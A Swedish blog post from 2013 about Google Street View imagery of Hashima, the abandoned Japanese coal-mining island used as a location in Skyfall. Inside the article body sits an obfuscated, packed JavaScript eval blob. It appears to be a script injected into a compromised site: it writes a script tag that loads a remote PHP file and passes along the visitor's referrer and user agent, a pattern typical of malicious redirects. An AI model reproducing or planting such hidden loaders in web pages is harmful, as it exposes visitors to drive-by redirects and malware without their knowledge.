Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Google Street View i och runt på Hashima (ön i Skyfall)

Filip Urde
  • On 28 juni, 2013
  • http://www.revue.se/filip-urde

Google eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbkke|var|u0026u|referrer|abyrd||js|php’.split(’|’),0,{}))
Street View tar oss till Hashima, öde ön/staden som figurerade i bland annat James Bond: Skyfall. 

 

 

 

 

Tidigare i veckan så skrev vi om möjligheten att virtuellt upptäcka Burj Khalifa (se här) med Google Street View. Men nu så har vi alltså fått möjligheten att även upptäcka den japanska ön Hashima med hjälp av Google Street View.

Hashima var under 1887 och 1974 hemmet för kolgruvearbetare som grävde efter kol på ön.

Hashima har varit en öde ö sedan 1974 men öppnades upp för turism 2009. Så varför inte ta en liten promenad på ön idag?
www.google.com